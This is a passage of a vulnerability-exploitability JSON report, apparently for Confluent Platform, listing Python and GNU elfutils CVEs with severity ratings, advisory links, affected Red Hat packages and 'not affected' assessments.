          "url": "https://github.com/python/cpython/commit/7ad3093d76a748af55bdb1d2e8aad3638163b017"
        },
        {
          "url": "https://github.com/python/cpython/commit/9a23b753552afa28e3a2f4d8863572fc66479406"
        },
        {
          "url": "https://github.com/python/cpython/commit/ae99fe3a33b43e303a05f012815cef60b611a9c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/d10950739a78f54d0718d88fb5a868374603c084"
        },
        {
          "url": "https://github.com/python/cpython/issues/141707"
        },
        {
          "url": "https://github.com/python/cpython/pull/143934"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/EOMI5I66ZMKQ2INNFT6T7IAIKUGPZYIE/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13462"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
        }
      ],
      "published": "2026-03-12T18:16:21+00:00",
      "updated": "2026-08-13T01:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1371",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability has been found in GNU elfutils 0.192 and classified as problematic. This vulnerability affects the function handle_dynamic_symtab of the file readelf.c of the component eu-read. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The patch is identified as b38e562a4c907e08171c76b8b2def8464d5a104a. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1371"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1371"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1371"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15926"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295978"
        },
        {
          "url": "https://vuldb.com/?id.295978"
        },
        {
          "url": "https://vuldb.com/?submit.496484"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T03:15:09+00:00",
      "updated": "2026-06-17T08:39:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1376",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1376"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1376"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1376"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15940"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672#c3"
        },
        {
          "url": "https://vuldb.com/?ctiid.295984"
        },
        {
          "url": "https://vuldb.com/?id.295984"
        },
        {
          "url": "https://vuldb.com/?submit.497538"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1376"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T05:15:09+00:00",
      "updated": "2026-06-17T08:39:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
